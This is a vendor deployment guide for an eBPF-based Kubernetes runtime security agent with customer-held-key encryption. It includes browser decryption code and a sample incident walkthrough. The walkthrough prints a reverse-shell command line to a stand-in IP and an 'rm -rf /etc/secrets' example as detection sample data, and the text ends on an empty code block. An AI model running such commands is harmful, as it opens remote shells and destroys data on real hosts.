Tier 3 Deployment & Customer Guide

Overview

Tier 3 (codename EcheDeep) is EchelonGraph's eBPF-based runtime security agent. It runs entirely on your Kubernetes cluster and feeds telemetry to your EchelonGraph SaaS tenant — encrypted with your own keys before it ever leaves your environment.

> Zero-knowledge by design. Your raw traffic, process events, and runtime findings are encrypted on-host with a per-event Data Encryption Key (DEK), wrapped under your customer-managed KMS key (AWS / GCP / Vault), and shipped as ciphertext. EchelonGraph SaaS stores ciphertext + indexed metadata only. Without your KMS, we cannot decrypt.

Shipped capabilities (chart 0.3.0 · agent 1.16.0, all 14 phases live):

  • T3.0 — Helm chart + ZK pipeline + agent enrollment
  • T3.1 — eBPF multi-hook (XDP + TC + tracepoints) with safety scanner
  • T3.2 — PII auto-stripping (11 default rules) + envelope encryption
  • T3.3 — Shadow API discovery (HTTP/2, gRPC, GraphQL, WebSocket, TLS-SNI)
  • T3.4 — Process monitoring (5 detection rule families with MITRE mapping)
  • T3.5 — ML anomaly detection (24h baseline + EWMA + 4 rules)
  • T3.6 — Threat intelligence (abuse.ch URLhaus + Feodo Tracker, CISA KEV, custom STIX 2.1 / TAXII 2.1)
  • T3.7 — Auto-remediation (9 K8s + Terraform patch templates, GitHub PR mode, Slack notifications)
  • T3.8 — Hardware KMS (AWS / GCP / Vault) with async DEK rotation
  • T3.9 — Custom compliance framework builder (DORA / NIS2 / CMMC / FedRAMP templates)
  • T3.10 — Enterprise packaging (Helm OCI, Grafana dashboard, 11 PrometheusRule alerts, air-gap bundle)
  • T3.11 — Browser SDK (Vault Transit) — TypeScript SDK using Web Crypto API for in-browser ZK decryption; backend GET /api/v1/zk/config; migration 045 tenant_zk_config table; admin PUT/DELETE for provider config
  • T3.12 — Browser SDK AWS KMS — hand-rolled SigV4 signer (Web Crypto HMAC-SHA256), ~7 KB gzipped; auth via Cognito Identity Pool / AssumeRoleWithWebIdentity / IAM Roles Anywhere
  • T3.13 — Browser SDK GCP Cloud KMS — REST + bearer-token, ~3 KB gzipped; auth via Google Identity Services / Workload Identity Federation

Zero-Knowledge Architecture — what we see vs. what we don't

The single most-asked question from prospective customers is: *"What can EchelonGraph staff actually read about my workloads?"* Honest answer:

What we see (indexed metadata)

  • Tenant ID + agent ID + pod ID + namespace name
  • Rule ID of every emitted finding (e.g. T3.4-PROC-REVERSE-SHELL, T3.6-IOC)
  • Severity + MITRE ATT&CK technique tag
  • Timestamp + event count
  • Wrapped DEK (your KMS-encrypted key — useless to us without your KMS)
  • Ciphertext payload of the actual event detail

What we cannot decrypt without your KMS

  • Process command lines (/bin/bash -c "rm -rf /etc/secrets") — encrypted
  • Destination IP addresses of network connections — encrypted
  • HTTP request paths + headers — encrypted (PII headers stripped before encryption)
  • File paths accessed by sensitive processes — encrypted
  • Shell environment variables — encrypted
  • TLS SNI hostnames + DNS query targets — encrypted

But how do alerts work if you can't read our data?

This is the natural follow-up question, and the answer is straightforward: detection happens on your servers, before encryption. The EchelonGraph agent on your host runs the ML anomaly engine, process monitoring rules, threat-intel matching, shadow API discovery, and all other detection logic locally, while the data is still in plaintext. By the time anything reaches our cloud, the *decision* ("is this suspicious?") has already been made.

Each finding has two parts:

Part | Encrypted? | What we use it for
Metadata | No (plaintext) | Routing alerts to Slack/PagerDuty/email/webhooks, populating dashboards, computing compliance scores, threshold-based alerting, MITRE ATT&CK heatmaps
Payload | Yes, locked with your KMS | Forensic investigation only: your analyst unlocks it in their browser when they click "view details"

What's in the metadata (we read this freely, this is what powers your alerts):

  • Rule ID (e.g. T3.4-PROC-REVERSE-SHELL, T3.6-IOC-MATCH, T3.5-ANOMALY-TRAFFIC-SPIKE)
  • Severity (critical / high / medium / low)
  • MITRE ATT&CK technique tag (e.g. T1059.004, Command and Scripting Interpreter: Unix Shell)
  • Timestamp + event count
  • Tenant ID, agent ID, pod name, namespace
  • Confidence score (0–1)

What's in the encrypted payload (we cannot read this):

  • Process command lines (e.g. /bin/bash -c "rm -rf /etc/secrets")
  • File paths accessed by sensitive processes
  • Destination IP addresses + DNS query targets
  • HTTP request bodies + headers (with PII auto-stripped before encrypt)
  • TLS SNI hostnames
  • Shell environment variables

So when your alert fires saying **"5 reverse-shell attempts in production namespace in the last 10 minutes"**, the count + rule + namespace are all plaintext metadata. We can route the alert. When the on-call analyst clicks the alert and wants to see *which* processes triggered it — that's when their browser unlocks the encrypted payload via your KMS.
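
A minimal TypeScript sketch of that split, assuming hypothetical FindingMetadata / Finding shapes whose field names simply follow the metadata list above (not a published EchelonGraph schema). The count behind an alert like the one above is computed from metadata alone; the encrypted payload travels with each finding but is never read.

```typescript
// Hypothetical shapes: field names follow the metadata list above,
// not a published EchelonGraph schema.
type Severity = "critical" | "high" | "medium" | "low";

interface FindingMetadata {
  ruleId: string;          // e.g. "T3.4-PROC-REVERSE-SHELL"
  severity: Severity;
  mitreTechnique: string;  // e.g. "T1059.004"
  ts: number;              // epoch milliseconds
  tenantId: string;
  agentId: string;
  pod: string;
  namespace: string;
  confidence: number;      // 0..1
  eventCount: number;
}

interface Finding {
  metadata: FindingMetadata;     // plaintext: drives routing and dashboards
  encryptedPayload: Uint8Array;  // ciphertext: opaque here, never inspected
}

// Sum event counts for one rule in one namespace over a trailing window.
// Only metadata is read.
function countRecent(
  findings: Finding[],
  ruleId: string,
  namespace: string,
  windowMs: number,
  now: number,
): number {
  let total = 0;
  for (const { metadata: m } of findings) {
    const inWindow = m.ts <= now && now - m.ts <= windowMs;
    if (m.ruleId === ruleId && m.namespace === namespace && inWindow) {
      total += m.eventCount;
    }
  }
  return total;
}

// Alert text built from the same metadata fields.
function alertText(count: number, ruleId: string, namespace: string, windowMin: number): string {
  return `${count} ${ruleId} events in ${namespace} namespace in the last ${windowMin} minutes`;
}
```

The alert manager only needs these plaintext fields, which is why routing keeps working even though the payload stays locked.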

> Why this split is the right call. Detection logic is heavy compute and needs the raw data; running it close to the data (on your host) is faster and more accurate. Alert routing is orchestration: it just needs to know "something fired" plus a few metadata fields. Investigation is rare (1–2% of findings), so it's reasonable for those to require an extra step (browser unlock). The trade-off: we lose the ability to retroactively re-run detection on old data; that has to happen on your host with a fresh agent version.

How your data stays private — end-to-end

The simple version: Your data gets locked the moment it's collected on your servers. We only ever see the locked version. The only place it gets unlocked is inside your analyst's browser — and the unlock key comes directly from your encryption service, not from us. If we vanished tomorrow, what we have is permanently unreadable.

Your encryption service

YOU CONTROL · AWS · GCP · Vault

In your cloud account, never EchelonGraph's. Both your agent (on your servers) and your analyst's browser call this service directly to lock and unlock data. We never call it. We never have a copy of the key.

  • Your master key NEVER leaves your account
  • All locking & unlocking happens in your KMS hardware
  • Every unlock is written to your KMS audit log

Your servers

YOU CONTROL

EchelonGraph agent runs here

  • Watches what's happening on your computers
  • Locks each piece of data the moment it's collected
  • Calls YOUR encryption service to lock the key — never us
Encrypted data sent over secure channel
(no plaintext ever leaves your servers)

EchelonGraph cloud

ECHELONGRAPH SAAS

We only ever see locked data

  • Stores locked data plus the alert metadata (when, what type)
  • Cannot unlock — we don't have your key
  • Even a database breach keeps your data unreadable
Encrypted data sent to dashboard
(still locked at this point)

Your analyst's browser

YOU CONTROL

The only place data gets unlocked

  • Browser unlocks the data key by calling YOUR KMS directly
  • The unlock request never passes through EchelonGraph
  • Key wiped from browser memory the moment they navigate away
🔒 Locked = encrypted, unreadable without your key
🔓 Unlocked = readable, only inside your browser
📦 Locked data travelling over a secure channel
🔐 Your encryption service, never EchelonGraph's
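
The lock/unlock flow above is standard envelope encryption. Here is a minimal TypeScript sketch using the Web Crypto API (browsers and Node 19+), under two loudly labelled assumptions: a local AES-KW key stands in for your KMS (in the real system the wrap and unwrap are calls to your AWS, GCP, or Vault KMS, and the master key never leaves it), and binding the tenant and agent IDs as AES-GCM additional authenticated data is our illustration, not a statement of the actual wire format. The names sealEvent, openEnvelope and aadFor are hypothetical.

```typescript
// Envelope encryption with the Web Crypto API (browsers, Node 19+).
// ASSUMPTION: `kek` is a local AES-KW key standing in for your KMS; in the
// real system the DEK wrap/unwrap is a call to AWS / GCP / Vault.
// ASSUMPTION: binding tenant/agent IDs as AAD is illustrative only.
const subtle = globalThis.crypto.subtle;

interface Envelope {
  nonce: BufferSource;      // 12-byte AES-GCM IV, fresh per event
  ciphertext: ArrayBuffer;  // encrypted payload with the 16-byte GCM tag appended
  wrappedDek: ArrayBuffer;  // the DEK, encrypted under the KEK
}

function aadFor(tenantId: string, agentId: string) {
  return new TextEncoder().encode(`${tenantId}|${agentId}`);
}

// Agent side: fresh 256-bit DEK per event, AES-GCM encrypt, then wrap the DEK.
async function sealEvent(
  plaintext: BufferSource,
  kek: CryptoKey,
  tenantId: string,
  agentId: string,
): Promise<Envelope> {
  const dek = await subtle.generateKey({ name: "AES-GCM", length: 256 }, true, ["encrypt", "decrypt"]);
  const nonce = globalThis.crypto.getRandomValues(new Uint8Array(12));
  const ciphertext = await subtle.encrypt(
    { name: "AES-GCM", iv: nonce, additionalData: aadFor(tenantId, agentId) },
    dek,
    plaintext,
  );
  const wrappedDek = await subtle.wrapKey("raw", dek, kek, "AES-KW");
  return { nonce, ciphertext, wrappedDek };
}

// Reader side: unwrap the DEK (your KMS in production), then decrypt locally.
async function openEnvelope(
  env: Envelope,
  kek: CryptoKey,
  tenantId: string,
  agentId: string,
): Promise<Uint8Array> {
  const dek = await subtle.unwrapKey(
    "raw", env.wrappedDek, kek, "AES-KW", { name: "AES-GCM" }, false, ["decrypt"],
  );
  const plaintext = await subtle.decrypt(
    { name: "AES-GCM", iv: env.nonce, additionalData: aadFor(tenantId, agentId) },
    dek,
    env.ciphertext,
  );
  return new Uint8Array(plaintext);
}
```

AES-GCM appends its 16-byte authentication tag to the ciphertext, and AES-KW adds 8 bytes to whatever it wraps, so a 32-byte DEK wraps to 40 bytes. The unwrapped DEK is imported as non-extractable, so page scripts cannot read its raw bytes back out.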

Why we can't read your data, even if we wanted to

This isn't a marketing claim; it's how the system is built. Every claim below is something you can independently check with your cloud provider, with your browser's developer tools, or by reading our open-source code. None of them require taking our word for anything.

Your master key never leaves your account

EchelonGraph never has a copy of your encryption key. It stays inside your AWS, GCP, or Vault account — locked in tamper-resistant hardware, like a physical safe.

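How to verify: Ask your cloud provider, "Can my master key ever be exported?" Answer: no, by design. (With Vault Transit, this holds as long as the key's exportable flag stays at its default, false.)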

Backed by

  • We only call your encryption service to lock and unlock data — we never receive the key itself
  • Your provider's hardware physically prevents the key from being copied out
  • Even our own staff would have nothing to leak in a worst-case breach

Decryption happens in your browser, not on our servers

When your analyst clicks "view details", their browser unlocks the data directly. The unlock request goes from their computer straight to your encryption service — it never passes through us.

How to verify: Open your browser's developer tools (F12) → Network tab → click a finding. You'll see the unlock request going to your cloud provider, NOT to echelongraph.io.

Backed by

  • Your browser → your AWS / GCP / Vault, direct, no proxy
  • EchelonGraph is not in the decryption path, so we never see the unlocked data
  • Your corporate firewall logs will confirm this independently
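
To automate the DevTools check, save the Network tab as a HAR file and scan it. A minimal sketch, assuming only the HAR 1.2 fields declared in the interfaces; the decrypt-call heuristics (Vault's /transit/decrypt/ path, Cloud KMS's :decrypt REST suffix, AWS KMS's TrentService.Decrypt target header) and the function names are our own and may need adjusting for custom Vault mounts or endpoints.

```typescript
// Minimal subset of the HAR 1.2 format that this check relies on.
interface HarHeader { name: string; value: string }
interface HarEntry { request: { method: string; url: string; headers: HarHeader[] } }
interface Har { log: { entries: HarEntry[] } }

// Heuristic: does this request look like a KMS unwrap call?
function isKmsDecrypt(entry: HarEntry): boolean {
  const { method, url, headers } = entry.request;
  if (method.toUpperCase() !== "POST") return false;
  const path = new URL(url).pathname;
  if (path.includes("/transit/decrypt/")) return true; // Vault Transit
  if (path.endsWith(":decrypt")) return true;          // GCP Cloud KMS REST
  return headers.some(                                 // AWS KMS JSON API
    (h) => h.name.toLowerCase() === "x-amz-target" && h.value === "TrentService.Decrypt",
  );
}

// Hosts that received decrypt calls, plus any of those owned by EchelonGraph.
function auditHar(har: Har): { kmsHosts: string[]; viaEchelon: string[] } {
  const hosts = new Set<string>();
  for (const entry of har.log.entries) {
    if (isKmsDecrypt(entry)) hosts.add(new URL(entry.request.url).hostname);
  }
  const kmsHosts = Array.from(hosts).sort();
  const viaEchelon = kmsHosts.filter((h) => h === "echelongraph.io" || h.endsWith(".echelongraph.io"));
  return { kmsHosts, viaEchelon };
}
```

A non-empty viaEchelon list would mean a decrypt call went to an EchelonGraph host; the property described above predicts it is always empty.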

Even if EchelonGraph vanished, your data stays safe

We only ever store the locked version. If our company shut down tomorrow, what we hold remains permanently unreadable to anyone — including any future buyer, our former employees, or anyone who breaches our database.

How to verify: Block app.echelongraph.io in your firewall for a day. Your locked data still sits in our database, and nobody can read it without your key.

Backed by

  • We can't be subpoenaed into producing plaintext we don't have
  • Court orders against us don't bypass your encryption — they hit a wall
  • Built-in compliance with GDPR Art. 25 (data protection by design and by default), DPDP, EU DORA, US CMMC 2.0

Every unlock is recorded in your audit trail

Your cloud provider logs every single time anyone unlocks a piece of your data — including which person unlocked it. The logs always show your team members' names, never EchelonGraph's, because we never make the call.

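How to verify: Check AWS CloudTrail, GCP Cloud Audit Logs, or your Vault audit log and filter for Decrypt calls. Every one will show your analyst's identity (typically their email address), never an EchelonGraph principal. GCP records Cloud KMS Decrypt calls only when Data Access audit logs are enabled, and Vault only once an audit device is enabled, so turn those on first.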

Backed by

  • Logs are written by your provider, not by us — we can't tamper with them
  • If our staff ever decrypted your data, the log would prove it (and we'd be in violation)
  • Many auditors accept this log as standalone proof of zero-knowledge
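
A sketch of the Vault side of that check, assuming Vault's JSON file audit device (enabled, for example, with vault audit enable file file_path=/var/log/vault_audit.log) and a Transit mount at transit. It reads only the type, auth.display_name and request.path fields; the exact display_name format depends on your auth method, and the "@acme-corp.com" suffix in the test is a stand-in for your own identity domain. Function names are hypothetical.

```typescript
// Fields of Vault's JSON audit log entries that this sketch reads.
interface VaultAuditEntry {
  type: "request" | "response";
  auth?: { display_name?: string };
  request?: { path?: string };
}

// Distinct callers of Transit decrypt on one key, from JSON-lines audit output.
function decryptCallers(lines: string[], mount: string, keyName: string): string[] {
  const target = `${mount}/decrypt/${keyName}`;
  const callers = new Set<string>();
  for (const line of lines) {
    if (line.trim() === "") continue;
    const entry = JSON.parse(line) as VaultAuditEntry;
    // Vault logs each call twice (request and response); count responses only.
    if (entry.type === "response" && entry.request?.path === target) {
      callers.add(entry.auth?.display_name ?? "<no display_name>");
    }
  }
  return Array.from(callers).sort();
}

// Callers that don't belong to your own identity domain.
function unexpectedCallers(callers: string[], allowedSuffix: string): string[] {
  return callers.filter((c) => !c.endsWith(allowedSuffix));
}
```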

The decryption code is open-source — verify it yourself

The exact code that runs in your browser to unlock data is published under Apache 2.0. Any developer on your team can read every line. We've also published 111 automated tests showing what it does.

How to verify: Read the source at frontend/src/lib/zkdecrypt/ in our public repo. If your security team prefers, copy it into your own dashboard; it'll work the same.

Backed by

  • Tests prove the wire format, the auth flow, and that keys are wiped from memory
  • Pull request history shows every change to the security-critical code
  • Your team can audit, fork, or replace it without permission from us
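
What "keys are wiped from memory" can mean in practice: a minimal sketch of a holder that zeroes its buffer on dispose(). The UnlockedDetail class and this zeroBytes helper are our own illustration (the walkthrough below names a zeroBytes call, but this is not the SDK source). One honest caveat: zeroing covers byte buffers only; strings decoded from them are immutable in JavaScript and are reclaimed by the garbage collector, not overwritten.

```typescript
// Illustrative only: our own holder class, not the SDK source.
function zeroBytes(buf: Uint8Array): void {
  buf.fill(0); // overwrite in place so the bytes don't linger until GC
}

class UnlockedDetail {
  private bytes: Uint8Array | null;

  constructor(plaintext: Uint8Array) {
    this.bytes = plaintext;
  }

  // Decode for display. The returned string is an immutable JS value
  // and cannot be zeroed; only the byte buffer can.
  text(): string {
    if (this.bytes === null) throw new Error("detail already disposed");
    return new TextDecoder().decode(this.bytes);
  }

  // Call when the analyst navigates away (e.g. from a component's cleanup).
  dispose(): void {
    if (this.bytes !== null) {
      zeroBytes(this.bytes);
      this.bytes = null;
    }
  }
}
```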

How your dashboard actually calls your KMS to unlock data

The diagram above shows the flow at the architecture level. Here's the same flow at the code level — what your developer wires into your dashboard. The pattern is the same shape for every provider: your dashboard's auth layer fetches a token or credentials from the customer's IdP, then hands them to the SDK's React hook. The SDK calls the customer's KMS directly when an analyst clicks "view locked details" — never through EchelonGraph.


HashiCorp Vault: the analyst signs into Vault through your IdP; the dashboard receives the resulting Vault token and passes it to the SDK, which sends it as X-Vault-Token.

Step 1 · in your dashboard's auth layer

1. Get a Vault token by signing the user in through your IdP (Okta / Azure AD / Auth0 / Google Workspace) and exchanging the IdP's ID token (a JWT) for a Vault token with Vault's JWT/OIDC auth method.

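// In your dashboard's auth layer
async function getVaultToken(): Promise<string> {
  // window.myIdP is a placeholder for your IdP client; it returns an
  // ID token (a JWT) for the signed-in user.
  const idToken = await window.myIdP.getIdToken();

  // Vault's JWT/OIDC auth method (mounted at "oidc" here) validates the JWT
  // and issues a Vault token. "echelongraph-analyst" is a placeholder role,
  // which must have role_type "jwt" to accept a JWT at this endpoint.
  const res = await fetch(
    "https://vault.your-company.com/v1/auth/oidc/login",
    {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ role: "echelongraph-analyst", jwt: idToken }),
    }
  );
  if (!res.ok) throw new Error(`Vault login failed: HTTP ${res.status}`);
  const json = await res.json();

  return json.auth.client_token; // lifetime is set by the role's token_ttl
}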
Step 2 · hand the credentials to the SDK

2. Use the token in a dashboard component. The SDK sends it as X-Vault-Token directly to YOUR Vault — no proxy through EchelonGraph.

import { useEffect, useState } from "react";
import { useZkConfig, useZkDecrypt } from "@echelongraph/zkdecrypt";

function FindingDetail({ finding, jwt }) {
  const [vaultToken, setVaultToken] = useState<string | null>(null);
  useEffect(() => { getVaultToken().then(setVaultToken); }, []);

  const { config } = useZkConfig(jwt);             // GET /api/v1/zk/config
  const { decrypt } = useZkDecrypt(config, {
    vaultToken: vaultToken ?? "",                  // your token, not ours
  });

  return (
    <button disabled={!config || !vaultToken} onClick={async () => {
      const { plaintext } = await decrypt({
        envelope:  finding.encryptedPayload,       // from EchelonGraph API
        tenantId:  finding.tenantId,
        agentId:   finding.agentId,
      });
      // Decryption happened in this browser; plaintext is a Uint8Array
      console.log(new TextDecoder().decode(plaintext));
    }}>
      View locked details
    </button>
  );
}
Things to know
  • Vault token is short-lived — the SDK surfaces 401/403 as kms_auth_failed; re-prompt for OIDC login when you see that
  • The Vault policy attached to the analyst's token must grant the update capability on transit/decrypt/<key-name> for the configured key; check your Vault audit log to see every unlock
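
Under the hood, the unlock is a single Vault Transit call. A minimal sketch of that call, assuming a Transit mount at transit and the key name from your config; KmsAuthError and unwrapDekViaVault are hypothetical names that mirror the kms_auth_failed behaviour described above, not the SDK's exports. Because the browser calls Vault cross-origin, this also assumes your Vault allows the dashboard's origin in its CORS configuration (sys/config/cors).

```typescript
// Sketch of the raw Vault Transit decrypt call. Endpoint and response shape
// follow Vault's Transit API; the names below are hypothetical, not SDK exports.
class KmsAuthError extends Error {
  readonly code = "kms_auth_failed";
}

async function unwrapDekViaVault(
  vaultAddr: string,   // e.g. "https://vault.acme.com"
  keyName: string,     // Transit key name, e.g. "echelongraph"
  vaultToken: string,  // from the JWT/OIDC login
  wrappedDek: string,  // "vault:v1:..." ciphertext from the envelope
  fetchFn: typeof fetch = fetch,
): Promise<Uint8Array> {
  const url = `${vaultAddr}/v1/transit/decrypt/${encodeURIComponent(keyName)}`;
  const res = await fetchFn(url, {
    method: "POST",
    headers: { "X-Vault-Token": vaultToken, "Content-Type": "application/json" },
    body: JSON.stringify({ ciphertext: wrappedDek }),
  });
  if (res.status === 401 || res.status === 403) {
    throw new KmsAuthError(`Vault rejected the token (HTTP ${res.status})`);
  }
  if (!res.ok) throw new Error(`Vault decrypt failed (HTTP ${res.status})`);
  const body = (await res.json()) as { data: { plaintext: string } };
  // Transit returns the plaintext base64-encoded; decode to raw DEK bytes.
  const binary = atob(body.data.plaintext);
  return Uint8Array.from(binary, (ch) => ch.charCodeAt(0));
}
```

Injecting fetchFn keeps the function testable without a live Vault; in a dashboard you would leave it at the default.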

For the complete API reference (envelope wire format, error codes, retry policy, browser/Node compatibility, dispose lifecycle, & admin write endpoint to configure your KMS), see /docs/tier3-zk-decryption. The SDK source is open under Apache 2.0 at frontend/src/lib/zkdecrypt/.

A complete incident — end-to-end with realistic data

Everything above is architecture and code. Here's what an actual production incident looks like: a reverse-shell attempt launched from a compromised pod in Acme Corp's production cluster, followed step by step from kernel-level eBPF detection through to GitHub-PR-driven auto-remediation, with real-shaped sample data showing what each party sees at every layer of the pipeline. Watch the boxes labelled ✓ Plaintext (data we read freely) and 🔒 We CANNOT read (data we cannot read at all); that contrast is the entire zero-knowledge promise made concrete.
  1. T+0.000 s · Your host (worker-3.acme-prod) · eBPF kernel hook

    Reverse-shell process spawns inside a production pod

    At 14:32:07.123 UTC, the gunicorn worker in the checkout-api deployment forks a new bash process. The eBPF tracepoint hook on the customer's host captures the execve system call and forwards it to the EchelonGraph agent for evaluation.
    Raw kernel event (only on customer's host) · ✓ Plaintext
    PID:    3847
    PPID:   3128 (gunicorn)
    Comm:   bash
    Args:   /bin/bash -c "bash -i >& /dev/tcp/198.51.100.74/4444 0>&1"
    Cwd:    /tmp
    UID:    33 (www-data)
    Pod:    checkout-api-pod-7b9c
    NS:     production
    Node:   worker-3.acme-prod
    This data NEVER leaves the host in plaintext.
  2. T+0.012 s · EchelonGraph agent (Tentacle DaemonSet) · Detection engines run locally

    Two detection rules fire on the customer's host

    The agent evaluates the event against every Tier 3 detection engine, all running locally on the customer's host with full plaintext access. Two rules match: the process monitor flags the bash command line as a reverse shell (T3.4), and the threat-intel matcher recognises the destination IP from the abuse.ch URLhaus feed (T3.6).
    Local detection result (still on host, plaintext) · ✓ Plaintext
    rules_matched: [T3.4-PROC-REVERSE-SHELL, T3.6-IOC-MATCH]
    mitre_technique: T1059.004  (Unix Shell)
    severity: critical
    confidence: 0.97
    ioc_source: abuse.ch URLhaus
    finding_id: f-9d4e2a17
    event_count: 1
    Detection logic runs in-process on the host. By this point the verdict is already final — EchelonGraph cloud never participates in detection.
  3. T+0.018 s · EchelonGraph agent · Encrypt + ship

    Agent locks the sensitive payload before shipping

    The agent generates a fresh 32-byte data key (DEK), AES-256-GCM encrypts the sensitive details (command line, file paths, destination IP, etc.), and asks the customer's KMS to wrap the DEK. The wrapped DEK plus ciphertext are bundled with the plaintext metadata and shipped over TLS 1.3 gRPC.
    Plaintext metadata sent to EchelonGraph · ✓ Plaintext
    {
      "tenant_id":       "acme-corp",
      "agent_id":        "tentacle-worker-3",
      "rule_id":         "T3.4-PROC-REVERSE-SHELL",
      "severity":        "critical",
      "mitre_technique": "T1059.004",
      "ts":              "2026-05-07T14:32:07.123Z",
      "pod":             "checkout-api-pod-7b9c",
      "namespace":       "production",
      "confidence":      0.97,
      "ioc_match":       "T3.6-IOC-MATCH",
      "event_count":     1
    }
    EchelonGraph reads this freely — it's how alerts get routed.
    Encrypted payload (locked with the customer's KMS) · 🔒 We CANNOT read
    nonce      (12 bytes hex):  a3f2e1c509bb47c1d4e832af
    ciphertext (245 bytes b64): kJh3T9xQ4Z2wL1vPdR8mN0yQp7Vk
                                sB8xJq2fT5rY3wHmN9pK4tA0iL6e
                                ... (truncated, 245 bytes total)
    AEAD tag   (16 bytes hex):  e1f8d3c4b29a5e6708d2f4a1... (truncated)
    wrapped-DEK (KMS blob):     AQECAHj8H5jK4Z9wL...
    Without the customer's KMS key, this is just random bytes — even our own DBA can't reconstruct the command line.
  4. T+0.450 s · EchelonGraph cloud · Ingester → CloudSQL + ClickHouse

    EchelonGraph stores the row — ciphertext stays opaque to us

    The Ingester validates the wire format, writes the metadata columns to Postgres for the alert layer to query, and pushes the ciphertext + wrapped-DEK to ClickHouse with a 90-day retention TTL. We index every metadata field for routing, compliance reporting, and dashboard queries.
    Stored row (what an EchelonGraph engineer can SELECT) · ✓ Plaintext
    tenant_id          | acme-corp
    rule_id            | T3.4-PROC-REVERSE-SHELL
    severity           | critical
    mitre_technique    | T1059.004
    ts                 | 2026-05-07 14:32:07.123
    pod                | checkout-api-pod-7b9c
    namespace          | production
    confidence         | 0.97
    ioc_match          | T3.6-IOC-MATCH
    encrypted_payload  | \xa3f2e1c509bb...e1f8d3c4   ← unreadable
    wrapped_dek        | \xAQECAHj8H5jK4Z9wL...      ← unreadable
    Our staff can run analytics on metadata. The two unreadable columns are what protects you.
  5. T+0.620 s · EchelonGraph alert manager · Slack / PagerDuty / webhook routing

    Alert fires — built entirely from plaintext metadata

    A pre-configured rule (“CRITICAL severity in production namespace”) matches. Alert manager builds a Slack message using the metadata fields only and POSTs it to the customer's Slack webhook. The encrypted payload is not touched.
    Slack message that fires in #soc-prod-alerts · ✓ Plaintext
    🚨 CRITICAL: Reverse shell in production
       Tenant: acme-corp · Pod: checkout-api-pod-7b9c
       Namespace: production · Confidence: 97%
       MITRE: T1059.004 (Unix Shell)
       IOC match: T3.6-IOC-MATCH
       Time: 2026-05-07 14:32:07 UTC
    
       [Investigate ↗]  [Acknowledge]  [Auto-remediate]
    The Slack message has zero plaintext details from the encrypted payload. Routing works fine without us reading anything.
  6. T+27 s · Alice (SOC analyst) · Opens app.echelongraph.io/findings/f-9d4e2a17

    Analyst opens the dashboard from the Slack alert

    Alice clicks [Investigate ↗] in Slack. Her browser navigates to app.echelongraph.io, the SPA loads, and the dashboard fetches the finding. The metadata renders immediately, but the “What process ran?”, “Where did it connect?”, and “Full command-line” sections show a “🔒 Locked, click to unlock” placeholder.
  7. T+30 s · Browser SDK (frontend/src/lib/zkdecrypt) · Calls Alice's Vault DIRECTLY

    Browser unlocks the data key via Vault — bypasses EchelonGraph

    Alice clicks “view locked details”. Her browser already has a Vault token from this morning's OIDC sign-in (cached in sessionStorage). The SDK POSTs the wrapped DEK directly to vault.acme.com. Vault decrypts it with the echelongraph Transit key, which never leaves Vault, and returns the plaintext DEK. The SDK runs AES-GCM decryption in the browser using the Web Crypto API, the plaintext renders, and zeroBytes(DEK) wipes the key from the JS heap.
    Browser → Vault POST (visible in DevTools Network tab) · 🔐 Customer's KMS
    POST https://vault.acme.com/v1/transit/decrypt/echelongraph
    X-Vault-Token: hvs.CAESI...       ← Alice's OIDC-derived token
    Content-Type: application/json
    
    {
      "ciphertext": "vault:v1:AQECAHj8H5jK4Z9wL..."  ← wrapped DEK
    }
    
    ← Response from Vault:
    {
      "data": { "plaintext": "<base64-encoded 32-byte DEK>" }
    }
    Open Alice's DevTools Network tab and you'll see this exact request going to vault.acme.com — NOT to echelongraph.io.
    Plaintext rendered in Alice's browser (and only there) · ✓ Plaintext
    Process command line:
      /bin/bash -c "bash -i >& /dev/tcp/198.51.100.74/4444 0>&1"
    
    Working directory: /tmp
    UID: 33 (www-data) — gunicorn's own user, no privilege escalation
    PID: 3847 · Parent: gunicorn (PID 3128)
    Destination: 198.51.100.74:4444
    
    IOC source: abuse.ch URLhaus
    First seen: 2026-04-22 — known C2 for "RedShell" toolkit
    This text exists only in Alice's browser tab memory. When she navigates away, dispose() wipes it.
  8. T+30.5 s · Acme's Vault audit log · Records the unlock with caller identity

    Vault writes an audit-log entry — proving Alice unlocked it, not us

    Vault's audit log records every Decrypt call with the caller's federated identity. Acme's SOC team (or an external auditor) can grep this log to confirm that EchelonGraph staff have never made a decrypt call against their key.
    Acme's Vault audit log (their copy, written by their Vault) · 📜 Customer's log
    2026-05-07 14:32:37 UTC — vault.transit.decrypt
      caller_id:   alice@acme-corp.com
      auth_method: oidc/okta
      key_name:    echelongraph
      success:     true
      request_id:  7c45-ab12-9e30-4f15
      remote_addr: 203.0.113.45 (Alice's office IP)
    The caller_id is Alice's IdP identity — never an EchelonGraph staff identity, because we never make the call.
  9. T+45 s · Auto-remediation engine (T3.7) · Generates IaC patch + opens GitHub PR

    Alice triggers auto-remediation — a NetworkPolicy PR opens

    Alice clicks Auto-remediate. The remediation engine selects the K8s NetworkPolicy template (matching the finding's category), substitutes the offending pod's labels, and opens a GitHub PR in acme-corp/infra-iac. Alice (admin role) clicks Merge → ArgoCD applies the policy → every pod labelled app: checkout-api, including the compromised one, loses egress in < 60 seconds.
    Auto-generated NetworkPolicy (committed to acme-corp/infra-iac) · ✓ Plaintext
    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: deny-egress-checkout-api-incident-f9d4e2a17
      namespace: production
      annotations:
        echelongraph.io/finding: f-9d4e2a17
        echelongraph.io/rule:    T3.4-PROC-REVERSE-SHELL
    spec:
      podSelector:
        matchLabels:
          app: checkout-api
      policyTypes: [Egress]
      egress: []   # deny all outbound traffic
    PR opened by github-app/echelongraph-bot · approved by alice@acme-corp.com · merged at 14:33:41 · ArgoCD synced at 14:34:09.
End-to-end recap: remediation triggered at T+45 s, pod isolated about two minutes after the kernel event

Detection ran on Acme's host (T+0 to T+18 ms). Encryption + ship took ~430 ms over TLS 1.3 gRPC. The alert reached Slack 620 ms after the kernel event. Alice opened the dashboard, unlocked the encrypted payload via her own Vault, and triggered remediation 45 seconds after the kernel event; the PR merged at 14:33:41 and ArgoCD synced the policy at 14:34:09, isolating the compromised pod about two minutes after detection. Throughout the entire incident, EchelonGraph never read the bash command line, the destination IP, or any other detail of the actual exploit, only the metadata needed to route the alert. Acme's Vault audit log proves it: every Decrypt call shows alice@acme-corp.com as the caller, never an EchelonGraph identity.
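
Steps 1 and 2 above describe the agent evaluating the execve event locally. A deliberately simplified sketch of that idea, not the shipped T3.4/T3.6 rules: it flags an interactive shell (-i) whose I/O is redirected to a /dev/tcp or /dev/udp socket, and checks the socket's address against an IOC set. In production that set would come from the threat-intel feeds; here it is a literal, and evaluateExec is a hypothetical name.

```typescript
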